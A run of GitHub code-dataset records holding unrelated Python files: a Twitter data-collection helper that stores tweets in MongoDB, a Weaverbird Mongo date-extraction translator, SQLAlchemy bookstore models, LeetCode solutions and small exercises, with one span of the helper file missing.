])\naddtabs = lambda table, count=1: '\\n'+'\\n'.join(['\\t'*count+line for line in table.split('\\n')])+'\\n'\ndef search(keyword):\n res = []\n #find in dbs:\n objs = json.loads(get_all_dbs())\n for obj in objs:\n if obj['ready']==True:\n for k,v in obj.items():\n if type(v)==str and v.lower().find(keyword.lower())>=0:\n res.append({ 'title': v,\n 'desc' : 'A match found for '+k+' in the databases.',\n 'link' : '/output/'+obj['dbname']+'/'+obj['dbname']+'_report.pdf'\n })\n break\n #find in about, documentation, dissertation\n f = open('./config/metadata.json','r')\n mydict = json.loads(f.read())\n f.close()\n for k, v in mydict.items():\n for key in v[0]:\n if key.find(keyword.lower())>=0:\n res.append({ 'title': key,\n 'desc' : 'A match found for in '+k+' section for the search.',\n 'link' : v[1] })\n break\n return json.dumps(res)\n\ndef get_all_dbs():\n dbpath = './data/pickle/'\n res = []\n for root, dirs, files in os.walk(dbpath):\n for adir in dirs:\n with open(os.path.join(root,adir,'input.in')) as f:\n params = f.read().splitlines()\n obj = { 'country' : params[5],\n 'keyword1' : params[0],\n 'keyword2' : params[1],\n 'fromDate' : params[2],\n 'toDate' : params[3],\n 'dbname' : params[4],\n 'ready' : os.path.exists('./app/output/'+params[4]+'/'+params[4]+'_report.pdf') }\n res.append(obj)\n return json.dumps(res)\n\n#Remove those from the formula which is not in dataframe columns\ndef removeUnwanted(formula, columns):\n y = formula[:formula.find('~')].rstrip().lstrip()\n X = formula[formula.find('~')+1:].rstrip().lstrip()\n X = [o.rstrip().lstrip() for l in X.split('+') for m in l.split(':') for o in m.split('*')]\n for col in X:\n if col not in columns:\n formula = formula.replace(col,'')\n while formula.find(' ')!=-1 or formula.find('++')!=-1 or \\\n formula.find('**')!=-1 or formula.find('::')!=-1 or \\\n formula.find('+:')!=-1 or formula.find(':+')!=-1 or \\\n formula.find('+*')!=-1 or formula.find('*+')!=-1:\n formula = formula.replace(' ','')\n formula = formula.replace('++','+')\n formula = formula.replace('**','*')\n formula = formula.replace('::',':')\n formula = formula.replace('+:','+')\n formula = formula.replace(':+','+')\n formula = formula.replace('+*','+')\n formula = formula.replace('*+','+')\n if formula[-1]==':' or formula[-1]=='*' or formula[-1]=='+':\n formula = formula[:-1]\n formula = formula.replace('+',' + ')\n formula = formula.replace('~',' ~ ')\n return formula\n# get the dictionary of predictors map\ndef getPreDict(xcols):\n pdict = {}\n for col in xcols:\n lookfor = '[T.' if col.find('[T.')!=-1 else '['\n if col.find(lookfor)!=-1 and col.find(':')==-1 and col.find('*')==-1:\n key = col[:col.find(lookfor)]\n if key in pdict.keys():\n pdict[key].append(col[col.find(lookfor)+len(lookfor):-1])\n else:\n pdict[key] = [col[col.find(lookfor)+len(lookfor):-1]]\n else:\n pdict[col] = []\n return pdict\n# get Reference variable from the given formula\ndef getRefDict(xcols, df):\n pdict = getPreDict(xcols)\n refdict = {}\n for col in pdict.keys():\n if pdict[col]!=[]:\n refdict[col] = str(list(set(df[col].values)-set(pdict[col]))[0])\n return refdict\n# prettyjoin\ndef prettyjoin(xcols, dfcols):\n pdict = getPreDict(xcols)\n mainstr = ''\n i = 1\n for col in pdict.keys():\n sep = ''\n if i==len(pdict.keys())-1:\n sep = ' and, '\n elif i!=len(pdict.keys()):\n sep = ', '\n if len(pdict[col])==0:\n mainstr += col + sep\n elif len(pdict[col])==1:\n mainstr += col + ' - ' + pdict[col][0] + sep\n else:\n mainstr += col + ' - ' + ', '.join(pdict[col][:len(pdict[col])-1]) + ' and, ' + pdict[col][-1] + sep\n i += 1\n return mainstr\n# get all countires, its code and its subdivisions\ndef get_all_countries():\n countries = {}\n for c in list(pycountry.countries):\n try:\n subs = []\n for sub in list(pycountry.subdivisions.get(country_code=c.alpha2)):\n for name in sub.name.split(';'):\n for n in name.split(','):\n subs.append(n)\n countries[c.name] = {'name': c.name, 'code': c.alpha2, 'subdivisions': list(set(subs))}\n except Exception as e:\n pass\n return countries\n\ndef containsAny(keywords, text):\n flag = False\n for keyword in keywords.split(' '):\n if text.lower().find(keyword.lower())>-1:\n flag = True\n return flag\n\ndef clean(text):\n text = re.sub(r'[^a-zA-Z0-9 \\'\\:\\,\\-\\.\\!\\_\\(\\)\\?\\\"\\;\\/\\\\\\#\\@]+', '', text)\n text = text.replace(' ',' ')\n text = text.rstrip().lstrip()\n return text\n\ndef reverse_map(mydict):\n values = [value for key in mydict.keys() for value in mydict[key]]\n values = list(set(values))\n newdict = {}\n for value in values:\n if value not in newdict.keys():\n newdict[value] = [key for key in mydict.keys() if value in mydict[key]]\n return newdict\n\ndef get_variables(path):\n f = open(path)\n var = yaml.load(f)\n return var\n\ndef wait_to_recover(func):\n def wrapper(*args, **kargs):\n result = None\n try:\n result = func(*args, **kargs)\n except Exception as e:\n # print('\\nError: ', e)\n time.sleep(120)\n return result\n return wrapper\n\n@wait_to_recover\ndef find_place_ids(api, country_code, subdivision):\n res = api.geo_search(query=subdivision, granularity='city')\n place_ids = []\n for place in res:\n if place.country_code==country_code and place.id not in place_ids:\n place_ids.append(place.id)\n return place_ids\n\ndef download_place_ids(api, country):\n bar = IncrementalBar('Downloading ', max=len(country['subdivisions']))\n places = {}\n i = 0\n while i0 else ''\n source = re.sub('<[A-Za-z\\/][^>]*>','', status.source)\n dt = status.created_at.strftime('%a %b %d %H:%M:%S %Y')\n dt = datetime.datetime.strptime(dt,'%a %b %d %H:%M:%S %Y')\n # print('status',i,'and user',status.user.id_str)\n # print((since-until).days, (since-dt).days, (until-dt).days, containsAny(data['keyword'], text))\n if dt>until and until>since and containsAny(data['keyword'], text):\n statuses['timeline'].append({# ----------- Tweet Info ----------\n 'tweet_id' : status.id,\n 'created_at' : status.created_at,\n 'lang' : status.lang,\n 'retweeted' : status.retweeted,\n 'text' : text,\n 'links' : url,\n 'retweet_count' : status.retweet_count,\n # --------- Author Info ----------\n 'author_id' : status.author.id_str,\n 'author_screen_name': status.author.screen_name,\n # --------- Source Info ----------\n 'source' : source\n })\n if i==0:\n statuses['user'] = { # --------- User Info -----------\n 'user_id' : status.user.id_str,\n 'name' : status.user.name,\n 'screen_name' : status.user.screen_name,\n 'user_created_at' : status.user.created_at,\n 'description' : status.user.description,\n 'friends_count' : status.user.friends_count,\n 'statuses_count' : status.user.statuses_count,\n 'followers_count' : status.user.followers_count,\n 'favourites_count' : status.user.favourites_count,\n 'contributors_enabled' : status.user.contributors_enabled,\n # ----------- Place Info -----------\n 'place_id' : data['place_id'],\n 'subdivision' : data['subdivision'],\n 'location' : status.user.location\n }\n i+=1\n # --- end of for loop ---\n if len(statuses['timeline'])!=0 and statuses['user']!=None:\n f = open(data['path']+'/@'+data['id']+'.pkl', 'wb')\n pickle.dump(statuses, f)\n f.close()\n return True\n else:\n return False\n\ndef save_data_to_mongoDB(port_number, DBName, dirpath, user_ids):\n bar = IncrementalBar('Processing ', max=len(user_ids))\n client = MongoClient(port=port_number)\n db = client[DBName]\n db.metadata.insert({'source': 'downloader'})\n for user_id in user_ids:\n filename = dirpath+'/@' + user_id + '.pkl'\n if os.path.exists(filename) and os.path.isfile(filename):\n f = open(filename, 'rb')\n statuses = pickle.load(f)\n f.close()\n db.users.insert(statuses['user'])\n for post in statuses['timeline']:\n post['user_id'] = statuses['user']['user_id'] # add foreign key !!!\n db.tweets.insert(post)\n bar.next()\n return None\n","repo_name":"praveer-k/campaign-monitor","sub_path":"lib/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":12561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12813273096","text":"from weaverbird.backends.mongo_translator.steps.types import MongoStep\nfrom weaverbird.pipeline.steps import DateExtractStep\n\n\ndef _truncate_date_to_day(expr: dict | str) -> MongoStep:\n return {\n \"$dateTrunc\": {\n \"unit\": \"day\",\n \"date\": expr,\n },\n }\n\n\ndef _extract_quarter(step: DateExtractStep) -> MongoStep:\n return {\n \"$switch\": {\n \"branches\": [\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]}, \"then\": 1},\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 2]}, \"then\": 2},\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 3]}, \"then\": 3},\n ],\n \"default\": 4,\n },\n }\n\n\ndef _extract_first_day_of_year(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\"year\": {\"$year\": f\"${step.column}\"}, \"month\": 1, \"day\": 1},\n }\n\n\ndef _extract_first_day_of_month(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\"$year\": f\"${step.column}\"},\n \"month\": {\"$month\": f\"${step.column}\"},\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_week(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date a number of days corresponding to (dayOfWeek - 1)\n \"$subtract\": [\n f\"${step.column}\",\n {\n \"$multiply\": [\n {\"$subtract\": [{\"$dayOfWeek\": f\"${step.column}\"}, 1]},\n 24 * 60 * 60 * 1000,\n ],\n },\n ],\n }\n )\n\n\ndef _extract_first_day_of_quarter(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\"$year\": f\"${step.column}\"},\n \"month\": {\n \"$switch\": {\n \"branches\": [\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]},\n \"then\": 1,\n },\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 2]},\n \"then\": 4,\n },\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 3]},\n \"then\": 7,\n },\n ],\n \"default\": 10,\n },\n },\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_iso_week(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date a number of days corresponding to (isoDayOfWeek - 1)\n \"$subtract\": [\n f\"${step.column}\",\n {\n \"$multiply\": [\n {\"$subtract\": [{\"$isoDayOfWeek\": f\"${step.column}\"}, 1]},\n 24 * 60 * 60 * 1000,\n ],\n },\n ],\n }\n )\n\n\ndef _extract_previous_day(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date 1 day in milliseconds\n \"$subtract\": [f\"${step.column}\", 24 * 60 * 60 * 1000],\n }\n )\n\n\ndef _extract_first_day_of_previous_year(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\"$subtract\": [{\"$year\": f\"${step.column}\"}, 1]},\n \"month\": 1,\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_previous_month(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\n \"$cond\": [\n {\"$eq\": [{\"$month\": f\"${step.column}\"}, 1]},\n {\"$subtract\": [{\"$year\": f\"${step.column}\"}, 1]},\n {\"$year\": f\"${step.column}\"},\n ],\n },\n \"month\": {\n \"$cond\": [\n {\"$eq\": [{\"$month\": f\"${step.column}\"}, 1]},\n 12,\n {\"$subtract\": [{\"$month\": f\"${step.column}\"}, 1]},\n ],\n },\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_previous_week(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date a number of days corresponding to (dayOfWeek - 1)\n \"$subtract\": [\n {\"$subtract\": [f\"${step.column}\", 7 * 24 * 60 * 60 * 1000]},\n {\n \"$multiply\": [\n {\"$subtract\": [{\"$dayOfWeek\": f\"${step.column}\"}, 1]},\n 24 * 60 * 60 * 1000,\n ],\n },\n ],\n }\n )\n\n\ndef _extract_first_day_of_previous_quarter(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\n \"$cond\": [\n {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]},\n {\"$subtract\": [{\"$year\": f\"${step.column}\"}, 1]},\n {\"$year\": f\"${step.column}\"},\n ],\n },\n \"month\": {\n \"$switch\": {\n \"branches\": [\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]},\n \"then\": 10,\n },\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 2]},\n \"then\": 1,\n },\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 3]},\n \"then\": 4,\n },\n ],\n \"default\": 7,\n },\n },\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_previous_iso_week(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date a number of days corresponding to (isoDayOfWeek - 1)\n \"$subtract\": [\n {\"$subtract\": [f\"${step.column}\", 7 * 24 * 60 * 60 * 1000]},\n {\n \"$multiply\": [\n {\"$subtract\": [{\"$isoDayOfWeek\": f\"${step.column}\"}, 1]},\n 24 * 60 * 60 * 1000,\n ],\n },\n ],\n }\n )\n\n\ndef _extract_previous_year(step: DateExtractStep) -> MongoStep:\n return {\n \"$subtract\": [{\"$year\": f\"${step.column}\"}, 1],\n }\n\n\ndef _extract_previous_month(step: DateExtractStep) -> MongoStep:\n return {\n \"$cond\": [\n {\"$eq\": [{\"$month\": f\"${step.column}\"}, 1]},\n 12,\n {\"$subtract\": [{\"$month\": f\"${step.column}\"}, 1]},\n ],\n }\n\n\ndef _extract_previous_week(step: DateExtractStep) -> MongoStep:\n return {\n # We subtract to the target date 7 days in milliseconds\n \"$week\": {\"$subtract\": [f\"${step.column}\", 7 * 24 * 60 * 60 * 1000]},\n }\n\n\ndef _extract_previous_quarter(step: DateExtractStep) -> MongoStep:\n return {\n \"$switch\": {\n \"branches\": [\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]}, \"then\": 4},\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 2]}, \"then\": 1},\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 3]}, \"then\": 2},\n ],\n \"default\": 3,\n },\n }\n\n\ndef _extract_previous_iso_week(step: DateExtractStep) -> MongoStep:\n return {\n # We subtract to the target date 7 days in milliseconds\n \"$isoWeek\": {\"$subtract\": [f\"${step.column}\", 7 * 24 * 60 * 60 * 1000]},\n }\n\n\n_ADVANCED_DATE_EXTRACT_MAP = {\n \"quarter\": _extract_quarter,\n \"firstDayOfYear\": _extract_first_day_of_year,\n \"firstDayOfMonth\": _extract_first_day_of_month,\n \"firstDayOfWeek\": _extract_first_day_of_week,\n \"firstDayOfQuarter\": _extract_first_day_of_quarter,\n \"firstDayOfIsoWeek\": _extract_first_day_of_iso_week,\n \"previousDay\": _extract_previous_day,\n \"firstDayOfPreviousYear\": _extract_first_day_of_previous_year,\n \"firstDayOfPreviousMonth\": _extract_first_day_of_previous_month,\n \"firstDayOfPreviousWeek\": _extract_first_day_of_previous_week,\n \"firstDayOfPreviousQuarter\": _extract_first_day_of_previous_quarter,\n \"firstDayOfPreviousIsoWeek\": _extract_first_day_of_previous_iso_week,\n \"previousYear\": _extract_previous_year,\n \"previousMonth\": _extract_previous_month,\n \"previousWeek\": _extract_previous_week,\n \"previousQuarter\": _extract_previous_quarter,\n \"previousIsoWeek\": _extract_previous_iso_week,\n}\n\n_DATE_EXTRACT_MAP = {\n \"year\": \"$year\",\n \"month\": \"$month\",\n \"day\": \"$dayOfMonth\",\n \"week\": \"$week\",\n \"dayOfYear\": \"$dayOfYear\",\n \"dayOfWeek\": \"$dayOfWeek\",\n \"isoYear\": \"$isoWeekYear\",\n \"isoWeek\": \"$isoWeek\",\n \"isoDayOfWeek\": \"$isoDayOfWeek\",\n \"hour\": \"$hour\",\n \"minutes\": \"$minute\",\n \"seconds\": \"$second\",\n \"milliseconds\": \"$millisecond\",\n}\n\n\ndef translate_date_extract(step: DateExtractStep) -> list[MongoStep]:\n new_columns = []\n add_fields = {}\n\n date_info: list\n # For retrocompatibility\n if step.operation:\n date_info = [step.operation] if step.operation else step.date_info\n new_columns = [\n step.new_column_name if step.new_column_name else f\"{step.column}_{step.operation}\"\n ]\n else:\n date_info = step.date_info.copy()\n new_columns = step.new_columns.copy()\n\n for i, d in enumerate(date_info):\n if d in _ADVANCED_DATE_EXTRACT_MAP:\n add_fields[new_columns[i]] = _ADVANCED_DATE_EXTRACT_MAP[d](step)\n else:\n add_fields[new_columns[i]] = {\n _DATE_EXTRACT_MAP[d]: f\"${step.column}\",\n }\n\n return [{\"$addFields\": add_fields}]\n","repo_name":"ToucanToco/weaverbird","sub_path":"server/src/weaverbird/backends/mongo_translator/steps/date_extract.py","file_name":"date_extract.py","file_ext":"py","file_size_in_byte":10257,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"60"} +{"seq_id":"2520768267","text":"# Problem Id: 97\n# Problem Name: Interleaving String, 交错字符串\n# Problem Url: https://leetcode-cn.com/problems/interleaving-string/\n# Problem Level: Medium\n# Language: Python3\n \nclass Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n if len(s1) + len(s2) != len(s3):\n return False\n m = len(s1)\n n = len(s2)\n dp = []\n for i in range(m+1):\n dp.append([False]*(n+1))\n dp[0][0] = True \n for i in range(1,m+1):\n dp[i][0] = dp[i-1][0] and s1[i-1] == s3[i-1]\n for j in range(1,n+1):\n dp[0][j] = dp[0][j-1] and s2[j-1] == s3[j-1]\n for i in range(1,m+1):\n for j in range(1,n+1):\n dp[i][j] = (dp[i-1][j] and s1[i-1] == s3[i+j-1]) or (dp[i][j-1] and s2[j-1] == s3[i+j-1])\n return dp[-1][-1]","repo_name":"siru-xiong/leetcode-solutions","sub_path":"solutions/0097-交错字符串.py","file_name":"0097-交错字符串.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29671384900","text":"# return given number in reverse order \n\ndef reverse(num) : \n sum = 0 \n if num == 0 : \n return 0 \n \n if num != 0 : \n rem = num%10 \n return sum*10 + rem + reverse(num//10)\n else : \n return sum\n return sum \n\n\n\nnum = int(input(\"Enter any number : \"))\nrevnum = reverse(num)\nprint(\"reverse number : \",revnum)","repo_name":"JaydeepKachare/Python-Classwork","sub_path":"Recursion/527.py","file_name":"527.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17231167700","text":"import sys\n\nfrom parrthon.lexer import ParrthonLexer\nfrom parrthon.parser import ParrthonParser\nfrom parrthon.errors import ExitParrthon\n\ndef read_file(path: str):\n lexer = ParrthonLexer()\n parser = ParrthonParser()\n\n with open(path, 'r') as f:\n lines = f.read().splitlines()\n \n # Remove empty lines\n lines = list(filter(None, lines))\n\n # Parse each line\n for line in lines:\n try: \n parser.parse(lexer.tokenize(line))\n except EOFError:\n break\n except ExitParrthon:\n return\n\n\nif __name__ == \"__main__\":\n assert len(sys.argv) == 2, \"Ye biscuit eater need a .parr file path\"\n \n path = sys.argv[1]\n\n read_file(path)","repo_name":"ArztKlein/parrthon","sub_path":"parrthon/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38510700596","text":"import sqlalchemy as sq\nfrom sqlalchemy.orm import declarative_base, relationship\n\nBase = declarative_base()\n\n\nclass Publisher(Base):\n __tablename__ = 'publisher'\n\n id = sq.Column(sq.Integer, primary_key=True)\n name = sq.Column(sq.String(length=40), unique=True)\n\n books = relationship('Book', back_populates='publisher')\n\nclass Book(Base):\n __tablename__ = 'book'\n \n id = sq.Column(sq.Integer, primary_key=True)\n title = sq.Column(sq.String(length=40), unique=True)\n id_publisher = sq.Column(sq.Integer, sq.ForeignKey('publisher.id'), nullable=False)\n\n publisher = relationship('Publisher', back_populates='books')\n stock_book = relationship('Stock', back_populates='book_stock')\n\nclass Shop(Base):\n __tablename__ = 'shop'\n\n id = sq.Column(sq.Integer, primary_key=True)\n name = sq.Column(sq.String(length=40), unique=True)\n\n stock_shop = relationship('Stock', back_populates='shop_stock')\n\n\nclass Stock(Base):\n __tablename__ = 'stock'\n\n id = sq.Column(sq.Integer, primary_key=True)\n id_book = sq.Column(sq.Integer, sq.ForeignKey('book.id'), nullable=False)\n id_shop = sq.Column(sq.Integer, sq.ForeignKey('shop.id'), nullable=False)\n count = sq.Column(sq.Integer)\n\n book_stock = relationship('Book', back_populates='stock_book')\n shop_stock = relationship('Shop', back_populates='stock_shop')\n sale_stock = relationship('Sale', back_populates='stock_sale')\n\nclass Sale(Base):\n __tablename__ = 'sale'\n\n id = sq.Column(sq.Integer, primary_key=True)\n price = sq.Column(sq.Float, nullable=False)\n date_sale = sq.Column(sq.String, nullable=False)\n id_stock = sq.Column(sq.Integer, sq.ForeignKey('stock.id'), nullable=False)\n count = sq.Column(sq.Integer)\n\n stock_sale = relationship('Stock', back_populates='sale_stock')\n\ndef create_tables(engine):\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n\n","repo_name":"SkibaEvgeniy/hw-bd6","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16876943182","text":"import sys\n\ninput = sys.stdin.readline\n\ndef find(a):\n if a!= parent[a]:\n parent[a] = find(parent[a])\n return parent[a]\n\ndef union(a, b):\n a = find(a)\n b = find(b)\n if a=0:\n print(\"YES\")\n","repo_name":"borish3198/Problem_Solving","sub_path":"BOJ/find_union/1976.py","file_name":"1976.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25478067635","text":"\"\"\"exercise 7 week 0\"\"\"\n# Create a list of the cubes of x for x in [0, 10] using:\n# a) a for loop\n# b) a list comprehension\n\n# a)\ncubes = []\nfor x in range(0, 11):\n cubes.append(x * x * x)\n\nprint(cubes)\n\n# b)\ncubes = [x * x * x for x in range(0, 11)]\n\nprint(cubes)\n","repo_name":"NicoloSalimbeni/high_level_programming","sub_path":"exercises/week_0/ex_7.py","file_name":"ex_7.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5409093893","text":"#ДЗ на вторник:\n# 1. Написать рекурсивную функцию, которая определяет, является ли строка палиндромом\n# (одинаково читается в обе стороны: герег, лол, мам, level и тд.)\n#Шаблон:\n\ndef is_palindrome(stroka):\n if len(stroka) < 2:\n return True\n elif stroka[0] != stroka[-1]:\n return False\n else:\n return is_palindrome(stroka[1:-1])\n\nprint(is_palindrome(\"level\"))\n\n\n#2. Написать рекурсивную функцию для подсчета количества элементов в списке.\n\ndef count_elem(my_list):\n if my_list == []:\n return 0\n return 1 + count_elem(my_list[1:])\n\nprint(count_elem(['a','b', 20, 30, 40, 5]))\n\n\n#3. Этот код отсортирует список строк по последнему символу в каждой строке.\n # Здесь использована лямбда-функция в качестве ключа в сортировке.\n# # Измените код так, чтобы сортировка была по второму символу каждой строки\n\nstrings = ['apple', 'banana', 'cherry', 'date']\nsorted_strings = sorted(strings, key=lambda s: s[2])\n# sorted_strings_1 = sorted(strings, key=lambda s: s[1])\nprint(sorted_strings) # Output: ['cherry', 'date', 'apple', 'banana']\n\n\n#4. Напишите функцию make_adder(n),\n# которая принимает целое число n и возвращает внутреннюю функцию,\n# которая может прибавлять этот n к любому другому целому числу.\n\ndef make_adder(n):\n def adder(x):\n return x + n\n return adder\n\nadd_1 = make_adder(1)\nadd_2 = make_adder(10)\n\nprint(add_1(4))\nprint(add_2(8))\nprint(make_adder(10)(20))\n\n#5. Напишите функцию counter(), которая возвращает внутреннюю функцию increment(),\n# которая увеличивает счетчик на 1 каждый раз, когда она вызывается.\n\ndef counter():\n count = 0\n def increment():\n nonlocal count\n count += 1\n return count\n return increment\n\nfunc_1 = counter()\n\nprint(func_1())\nprint(func_1())\nprint(func_1())","repo_name":"kotusch/python_dz","sub_path":"Katushonok_Lesson_13.py","file_name":"Katushonok_Lesson_13.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12067355087","text":"from sympy import *\n# Our state is [q, b], where q is quatenion and b are biases\nstate_len = 7\nx = IndexedBase('x', shape=(state_len,))\n# Without an input our state changed only by biases\n# So we repeat our quat\nI4 = Identity(4)\n# and we assume biases stay the same\nI3 = Identity(3)\n# we drop the first column to multiply quaternions with 3-vectors\ndef q2m(q):\n return Matrix([\n [-q.b, -q.c, -q.d],\n [ q.a, -q.d, q.c],\n [ q.d, q.a, -q.b],\n [-q.c, q.b, q.a]])\n\n# Convert indexed base to list\ndef i2l(i, start, stop):\n return [i[j] for j in range(start, stop)]\n\n# Convert indexed base to Matrix\ndef i2m(i):\n s = i.shape\n assert len(s) == 2, \"Works only for 2D case\"\n m = []\n for r in range(s[0]):\n tr = []\n for c in range(s[1]):\n tr.append(i[r, c])\n m.append(tr)\n return Matrix(m)\n\n# no interaction between q and b\nZ3x4 = zeros(3, 4)\n# we assume constant angular speed between measurements\ndt = symbols(\"d_t\")\n# Estimated quaternion\nq = Quaternion(*i2l(x, 0, 4))\n# Estimated bias\nb = Matrix(i2l(x, 4, 6))\n# State transition matrix\nA = Matrix(BlockMatrix([[I4, (-dt / 2.0) * q2m(q)], [Z3x4, I3]]))\n# Measured angular velocity control our attitude\nw = IndexedBase('w', shape=(3,))\nw_m = Matrix(i2l(w, 0, 3))\n# But doesn't influence the bias\nZ3x3 = zeros(3, 3)\n# So our control\nB = BlockMatrix([[q2m(q)], [Z3x3]])\n# State in matrix form\nx_m = Matrix(i2l(x, 0, state_len))\n# Next state\nnx = A * x_m + (dt / 2.0) * Matrix(B) * w_m\n\n# Output our state transition equation\noutput = MatrixSymbol('nx', state_len, 1)\n# Normalize quaternion to account for the limited precision\ndef norm_q(q):\n mag = (q[0]**2 + q[1]**2 + q[2]**2 + q[3]**2)**0.5\n return [q[i] / mag for i in range(4)]\n\nnx[0:4, :] = norm_q(nx[0:4])\n# print(\"// State transition\")\n# print(rust_code(nx, assign_to=output, contract=False))\n\n# We keep it symbolical for code generation, initialize to I7\nP = IndexedBase('P', shape=(state_len, state_len))\nP_m = i2m(P)\nQ = IndexedBase('Q', shape=(state_len, state_len))\nQ_m = i2m(Q)\n\nnP = A * P * A.transpose() + Q\noutput = MatrixSymbol('np', state_len, state_len)\n# print(\"// Error transition\")\n# print(ccode(nP, assign_to=output, contract=False))\n\n# Get homogeneous rotation matrix\ndef q2hrm(q):\n s = q.norm()**-2\n m00 = s * (q.a**2 + q.b**2 - q.c**2 - q.d**2)\n m11 = s * (q.a**2 - q.b**2 + q.c**2 - q.d**2)\n m22 = s * (q.a**2 - q.b**2 - q.c**2 + q.d**2)\n m = q.to_rotation_matrix().transpose()\n m[0, 0] = m00\n m[1, 1] = m11\n m[2, 2] = m22\n return m / s\n\n# Generate Jacobian equations\ndef gen_jac(q, r):\n return (q2hrm(q) * Matrix(i2l(r, 0, 3))).jacobian(Matrix([q.a, q.b, q.c, q.d]))\n\n# r = IndexedBase('r', shape=(3,))\n# output = MatrixSymbol('j', 3, 4)\n# print(ccode(gen_jac(q, r), assign_to=output, contract=False))\n\n# Now we have everything to predict accelerometer and magnetometer values\nar = Matrix(i2l(IndexedBase('a_r', shape=(3,)), 0, 3))\nmr = Matrix(i2l(IndexedBase('m_r', shape=(3,)), 0, 3))\nC_a = gen_jac(q, ar)\nC_m = gen_jac(q, mr)\nC = BlockMatrix([[C_a, Z3x3], [C_m, Z3x3]])\noutput = MatrixSymbol('C', 6, 7)\n# Convertion matrix\nprint(ccode(C, assign_to=output, contract=False))\n\ny = BlockMatrix([[q2hrm(q) * ar], [q2hrm(q) * mr]])\noutput = MatrixSymbol('y', 6, 1)\nprint(rust_code(y, assign_to=output, contract=False))\n","repo_name":"copterust/proving-ground","sub_path":"calibrating_ahrs/ekf/gen_ekf.py","file_name":"gen_ekf.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"60"} +{"seq_id":"35521898082","text":"# -*- coding: utf-8 -*-\n# Author: Weichen Liao\n\n'''\n\n10. Regular Expression Matching\n\nGiven an input string (s) and a pattern (p), implement regular expression matching with support for '.' and '*'.\n\n'.' Matches any single character.\n'*' Matches zero or more of the preceding element.\nThe matching should cover the entire input string (not partial).\n\nNote:\n\ns could be empty and contains only lowercase letters a-z.\np could be empty and contains only lowercase letters a-z, and characters like . or *.\nExample 1:\n\nInput:\ns = \"aa\"\np = \"a\"\nOutput: false\nExplanation: \"a\" does not match the entire string \"aa\".\nExample 2:\n\nInput:\ns = \"aa\"\np = \"a*\"\nOutput: true\nExplanation: '*' means zero or more of the preceding element, 'a'. Therefore, by repeating 'a' once, it becomes \"aa\".\nExample 3:\n\nInput:\ns = \"ab\"\np = \".*\"\nOutput: true\nExplanation: \".*\" means \"zero or more (*) of any character (.)\".\nExample 4:\n\nInput:\ns = \"aab\"\np = \"c*a*b\"\nOutput: true\nExplanation: c can be repeated 0 times, a can be repeated 1 time. Therefore, it matches \"aab\".\nExample 5:\n\nInput:\ns = 